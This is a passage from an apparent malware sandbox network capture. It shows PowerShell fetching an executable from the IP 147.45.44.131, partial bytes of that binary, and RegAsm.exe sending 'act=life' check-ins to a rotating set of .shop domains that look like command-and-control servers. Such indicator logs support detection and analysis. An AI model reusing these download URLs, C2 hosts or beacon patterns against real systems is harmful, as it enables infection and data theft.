Sep 26, 2024 21:06:09.346175909 CEST	192.168.2.4	1.1.1.1	0x318f	Standard query (0)	ghostreedmnu.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:10.311074972 CEST	192.168.2.4	1.1.1.1	0x2c44	Standard query (0)	offensivedzvju.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:11.273156881 CEST	192.168.2.4	1.1.1.1	0x3969	Standard query (0)	vozmeatillu.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:12.238203049 CEST	192.168.2.4	1.1.1.1	0x3fa0	Standard query (0)	drawzhotdog.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:13.186600924 CEST	192.168.2.4	1.1.1.1	0x5fbf	Standard query (0)	fragnantbui.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:14.188975096 CEST	192.168.2.4	1.1.1.1	0xd24c	Standard query (0)	stogeneratmns.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:15.342995882 CEST	192.168.2.4	1.1.1.1	0x6392	Standard query (0)	reinforcenh.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:16.343919039 CEST	192.168.2.4	1.1.1.1	0xaca	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:17.850769043 CEST	192.168.2.4	1.1.1.1	0xcbc0	Standard query (0)	ballotnwu.site	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:36.686690092 CEST	192.168.2.4	1.1.1.1	0xc7c1	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 21:06:07.082534075 CEST	1.1.1.1	192.168.2.4	0x68d1	No error (0)	ptramidermsnqj.shop		104.21.83.105	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:07.082534075 CEST	1.1.1.1	192.168.2.4	0x68d1	No error (0)	ptramidermsnqj.shop		172.67.222.194	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:08.119400024 CEST	1.1.1.1	192.168.2.4	0x1b8d	No error (0)	gutterydhowi.shop		104.21.4.136	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:08.119400024 CEST	1.1.1.1	192.168.2.4	0x1b8d	No error (0)	gutterydhowi.shop		172.67.132.32	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:09.361619949 CEST	1.1.1.1	192.168.2.4	0x318f	No error (0)	ghostreedmnu.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:09.361619949 CEST	1.1.1.1	192.168.2.4	0x318f	No error (0)	ghostreedmnu.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:10.330188990 CEST	1.1.1.1	192.168.2.4	0x2c44	No error (0)	offensivedzvju.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:10.330188990 CEST	1.1.1.1	192.168.2.4	0x2c44	No error (0)	offensivedzvju.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:11.286557913 CEST	1.1.1.1	192.168.2.4	0x3969	No error (0)	vozmeatillu.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:11.286557913 CEST	1.1.1.1	192.168.2.4	0x3969	No error (0)	vozmeatillu.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:12.252882004 CEST	1.1.1.1	192.168.2.4	0x3fa0	No error (0)	drawzhotdog.shop		172.67.162.108	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:12.252882004 CEST	1.1.1.1	192.168.2.4	0x3fa0	No error (0)	drawzhotdog.shop		104.21.58.182	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:13.211961031 CEST	1.1.1.1	192.168.2.4	0x5fbf	No error (0)	fragnantbui.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:13.211961031 CEST	1.1.1.1	192.168.2.4	0x5fbf	No error (0)	fragnantbui.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:14.210165977 CEST	1.1.1.1	192.168.2.4	0xd24c	No error (0)	stogeneratmns.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:14.210165977 CEST	1.1.1.1	192.168.2.4	0xd24c	No error (0)	stogeneratmns.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:15.361548901 CEST	1.1.1.1	192.168.2.4	0x6392	No error (0)	reinforcenh.shop		172.67.208.139	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:15.361548901 CEST	1.1.1.1	192.168.2.4	0x6392	No error (0)	reinforcenh.shop		104.21.77.130	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:16.354049921 CEST	1.1.1.1	192.168.2.4	0xaca	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:17.869723082 CEST	1.1.1.1	192.168.2.4	0xcbc0	No error (0)	ballotnwu.site		104.21.2.13	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:17.869723082 CEST	1.1.1.1	192.168.2.4	0xcbc0	No error (0)	ballotnwu.site		172.67.128.144	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:36.710407972 CEST	1.1.1.1	192.168.2.4	0xc7c1	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

ptramidermsnqj.shop

gutterydhowi.shop

ghostreedmnu.shop

offensivedzvju.shop

vozmeatillu.shop

drawzhotdog.shop

fragnantbui.shop

stogeneratmns.shop

reinforcenh.shop

steamcommunity.com

ballotnwu.site

147.45.44.131

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	147.45.44.131	80	7036	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 21:06:04.935115099 CEST	78	OUT	GET /files/gqgqg.exe HTTP/1.1 Host: 147.45.44.131 Connection: Keep-Alive
Sep 26, 2024 21:06:05.634766102 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:06:05 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 26 Sep 2024 14:25:26 GMT ETag: "f4800-6230682795730" Accept-Ranges: bytes Content-Length: 1001472 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 55 7d 8f a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 3c 0f 00 00 0a 00 00 00 00 00 00 de 5a 0f 00 00 20 00 00 00 60 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 5a 0f 00 57 00 00 00 00 60 0f 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELU}"0<Z `@ `ZW`6 H.text: < `.rsrc6`>@@.relocF@BZH"8((rNp(o(rp(oV~rCp((0c(oiYpai+'aaoY.X+Xi2iY(+0(rp(o(~((osso(rp(oo&o(rp(oo&o
Sep 26, 2024 21:06:05.634838104 CEST	1236	IN	Data Raw: 00 00 0a 08 17 8d 13 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 14 00 00 0a 72 0a 93 00 70 28 15 00 00 0a 6f 16 00 00 0a 6f 1e 00 00 0a 28 14 00 00 0a 72 24 93 00 70 28 15 00 00 0a 6f 16 00 00 0a 6f 1f 00 00 0a 14 18 8d 01 00 00 01 25 Data Ascii: %oo(rp(oo(r$p(oo%%o &*BSJBv4.0.30319l<#~D#Strings.#US6#GUID6#BlobW%3
Sep 26, 2024 21:06:05.634876013 CEST	248	IN	Data Raw: 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 72 69 62 75 74 65 00 54 61 72 67 65 74 46 72 Data Ascii: uteComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttribut
Sep 26, 2024 21:06:05.634905100 CEST	1236	IN	Data Raw: 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 62 75 74 65 00 52 75 6e 74 69 6d 65 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 74 74 72 69 62 75 74 65 00 42 79 74 Data Ascii: emblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteHomer Boomer.exeResizeEncodingSystem.Runtime.VersioningFromBase64StringGetStringkeyStringget_LengthugiMulProgramSystemMainSystem.ReflectionString
Sep 26, 2024 21:06:05.634939909 CEST	1236	IN	Data Raw: 32 00 53 00 32 00 34 00 32 00 4e 00 6e 00 70 00 72 00 4e 00 6c 00 6f 00 7a 00 65 00 57 00 64 00 51 00 54 00 7a 00 6c 00 79 00 55 00 43 00 73 00 72 00 4c 00 7a 00 64 00 45 00 63 00 48 00 4a 00 4e 00 59 00 56 00 56 00 32 00 59 00 69 00 38 00 7a 00 Data Ascii: 2S242NnprNlozeWdQTzlyUCsrLzdEcHJNYVV2Yi8zOGJ6NDViMmc4NzIyN3IzOHUrbUE4NjN6NWVDUXc3M3B2ZW50a01POTZiM3B2ZW0ydmJ2NHZlaTc4K25VO
Sep 26, 2024 21:06:05.634974003 CEST	1236	IN	Data Raw: 7a 00 51 00 33 00 4e 00 48 00 5a 00 6b 00 4b 00 33 00 63 00 32 00 59 00 58 00 70 00 73 00 64 00 47 00 49 00 76 00 4f 00 48 00 42 00 6c 00 61 00 58 00 4e 00 30 00 55 00 45 00 74 00 69 00 62 00 43 00 74 00 74 00 4f 00 54 00 5a 00 69 00 4d 00 6a 00 Data Ascii: zQ3NHZkK3c2YXpsdGIvOHBlaXN0UEtibCttOTZiMjBrTU8ydmVtOTZ2aW4rYnZ6K3FEeXA1RERrTU8ydmVtOTZ1K3MrcUQ1OCtuY3VmU0gvS1R6N3NTWDZiM3B
Sep 26, 2024 21:06:05.635006905 CEST	672	IN	Data Raw: 32 00 5a 00 57 00 30 00 79 00 64 00 6d 00 56 00 32 00 59 00 58 00 4a 00 50 00 62 00 57 00 51 00 35 00 59 00 6e 00 5a 00 36 00 4c 00 30 00 73 00 7a 00 5a 00 58 00 42 00 32 00 54 00 7a 00 6b 00 72 00 54 00 45 00 68 00 70 00 64 00 69 00 74 00 58 00 Data Ascii: 2ZW0ydmV2YXJPbWQ5YnZ6L0szZXB2TzkrTEhpditXUXc3M3B2ZW0ydmVtOTZiM3B2ZXZBOUx2cHZQeWwzS1g2OHFyWXNiL2xrTU8ydmVtOTZiM3B2ZW0ydmVtL
Sep 26, 2024 21:06:05.635041952 CEST	1236	IN	Data Raw: 32 00 4f 00 46 00 4e 00 6a 00 64 00 6d 00 56 00 74 00 4f 00 54 00 5a 00 69 00 4d 00 33 00 42 00 32 00 5a 00 57 00 35 00 79 00 63 00 48 00 4e 00 54 00 57 00 44 00 5a 00 69 00 4d 00 33 00 42 00 32 00 59 00 6c 00 4e 00 69 00 62 00 43 00 74 00 74 00 Data Ascii: 2OFNjdmVtOTZiM3B2ZW5ycHNTWDZiM3B2YlNibCttOTZiM3ErS2Z5NzZ6Nm9QS25rTU9ibCttOTZiM3E3Nnp4OUtiejZkeTU5STN6OGF6NnFPbXM3c1NjdmVtO
Sep 26, 2024 21:06:05.635073900 CEST	1236	IN	Data Raw: 6e 00 4a 00 51 00 52 00 33 00 4d 00 72 00 63 00 57 00 70 00 70 00 4b 00 30 00 39 00 49 00 56 00 58 00 41 00 72 00 62 00 56 00 6f 00 32 00 59 00 6e 00 55 00 79 00 4e 00 6d 00 46 00 49 00 64 00 6e 00 4a 00 51 00 65 00 58 00 52 00 7a 00 5a 00 57 00 Data Ascii: nJQR3MrcWppK09IVXArbVo2YnUyNmFIdnJQeXRzZW4vODczR2xMMnE4cWZpK0xIcDRLYkVsK20ydmVudHUvUy8vTDN6dmEzNHBmaXUvTDN6dmF2eXB2SHAycXp
Sep 26, 2024 21:06:05.635107040 CEST	1236	IN	Data Raw: 36 00 4b 00 79 00 74 00 75 00 4d 00 48 00 41 00 72 00 62 00 6e 00 41 00 76 00 4e 00 30 00 52 00 70 00 4b 00 30 00 78 00 79 00 53 00 33 00 55 00 76 00 55 00 7a 00 6b 00 32 00 59 00 58 00 6f 00 30 00 64 00 46 00 42 00 4c 00 55 00 58 00 63 00 33 00 Data Ascii: 6KytuMHArbnAvN0RpK0xyS3UvUzk2YXo0dFBLUXc3M3B2ZW5tNzZEcnFPbXN2YTN6OGF6NnFPbXN2YXY1OHFXOW0vaW8rWVR6OEtidnNObXM4YXp4L0wzNDRkU
Sep 26, 2024 21:06:05.635142088 CEST	1236	IN	Data Raw: 54 00 6b 00 32 00 59 00 6e 00 59 00 76 00 4c 00 7a 00 64 00 36 00 63 00 48 00 4a 00 50 00 4e 00 32 00 78 00 32 00 57 00 55 00 51 00 30 00 4e 00 6c 00 70 00 75 00 63 00 48 00 55 00 33 00 4d 00 6a 00 6b 00 35 00 59 00 6e 00 5a 00 36 00 4c 00 30 00 Data Ascii: Tk2YnYvLzd6cHJPN2x2WUQ0NlpucHU3Mjk5YnZ6L0szY3ZlbTc5S3ZqNmF6dTVaRER2ZW0ydmVtOTZiMnI4cWI2dmFEem9maTc5TDNlL0tmNXBmaTZzZW5qOUt

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	104.21.83.105	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 19:06:07 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ptramidermsnqj.shop
2024-09-26 19:06:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 19:06:08 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:06:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1pco6anibt5ivekjarp90vnu13; expires=Mon, 20 Jan 2025 12:52:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LG7VrWYliRS%2FgUV9JfQk6TruSJ92v1TKqPZcirl4z%2BNs3g2IYZ%2FBHktA4NwaVq4Eu0SDvsOzOm9wigp26YH01Bf%2B77VVQUVpKe2Fu9llkcMDrgzJ4DQ%2FDxX8LJzm1RQZnJUa0dFe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c958785e86e433f-EWR
2024-09-26 19:06:08 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 19:06:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.4.136	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 19:06:08 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-26 19:06:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 19:06:09 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:06:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5v4qqp2opi36g077585gmcggph; expires=Mon, 20 Jan 2025 12:52:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2UdOS7Dbj28Z8viYPmaBHVHIZ5rwJUdY2M3YCcK9cleSY7AI2NhvF%2B4FnVj%2BbNAvsf9Sltk0P8sllQwatPBLeX%2FuLh3IF%2Fwv6NMyyW9LhAN5tcmHBG5tdLxHg0CYjeXOgja8lA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c95878c7d2f4244-EWR
2024-09-26 19:06:09 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 19:06:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	188.114.96.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 19:06:09 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-26 19:06:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 19:06:10 UTC	782	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:06:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1se6qf7r40tp6s3pp1hbn74ssc; expires=Mon, 20 Jan 2025 12:52:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fud3SverG23iaVEubn%2BchDP94NfI4OmMo%2FQsSwsZ44Z5KH%2BB%2BkXNAAV11Fj1uy7lOb3IaOvg7y5eFZydCKQHMbTqcsfA2ypy6JJnP2gZIukL98O7Egi5BPfO%2BwmtWvtNpn8%2FWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c958793fba178e8-EWR
2024-09-26 19:06:10 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 19:06:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	188.114.96.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 19:06:10 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offensivedzvju.shop
2024-09-26 19:06:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 19:06:11 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:06:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s0rpl30a3vrn07fcvonh767ckf; expires=Mon, 20 Jan 2025 12:52:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EgSfqwz8E0mGrw4c0yaFRYgd9koP1T4lSt0zRoPMrKGRW6JsnEEocDKc67kgs4rPh9m2Wo%2BJyToOCi9%2FPSb1SDk%2BbbBRTWrte8eh%2FQ4zFf7awnjsrXLUM9ESxq1Hj5U68pjXxWvn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c958799f86442a5-EWR
2024-09-26 19:06:11 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 19:06:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	188.114.97.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 19:06:11 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vozmeatillu.shop
2024-09-26 19:06:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 19:06:12 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:06:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hacfcl62l1bjgio2cnrk5bcsmb; expires=Mon, 20 Jan 2025 12:52:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n1b5D6PKszVQzyhw6qaBR5f%2FE%2BUvqiGhg4VK6WXQYzgr6os%2BljBvoHsCYtcipS1pSzbLJCDvGEyDDt8GV%2FOQkQ8LqB%2B5fUqxh3Mu%2B9qtl36FWI%2B4xam9dgbuToWmgAnFCnUG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c95879fee1e424d-EWR
2024-09-26 19:06:12 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 19:06:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	172.67.162.108	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 19:06:12 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawzhotdog.shop
2024-09-26 19:06:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 19:06:13 UTC	770	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:06:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5949b9omge9qjta3jg2a67e120; expires=Mon, 20 Jan 2025 12:52:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ejOFTH88sxt5So4837aTj54v6mQS%2FQQ7GUNGwR%2BvXcAybcOT13Olj7Ry0ld16VYDpe6l%2BwLFFHFf5gZODeGf%2B8bqvaRYjFO7HmheXjzPFsxrrnIgi33rP9yMM4741QM%2BS04K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9587a5dff9421f-EWR
2024-09-26 19:06:13 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 19:06:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49737	188.114.97.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 19:06:13 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fragnantbui.shop
2024-09-26 19:06:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 19:06:14 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:06:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7valvve315b82ej5dhktndiako; expires=Mon, 20 Jan 2025 12:52:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FS3tbIvo%2F%2BhsmdQr7wbBW7vruC%2Fjpt0tSfia8nqh1g5W1yHNy1GRWWKEczC4EWgVThrAKFi%2FJbnz36H9ArwBAKqnKrpFaV93dTRtyi52jaw%2BZmzD67%2FMeUZ6yUJWrlGeqPuy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9587abebe94343-EWR
2024-09-26 19:06:14 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 19:06:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49738	188.114.96.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 19:06:14 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stogeneratmns.shop
2024-09-26 19:06:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
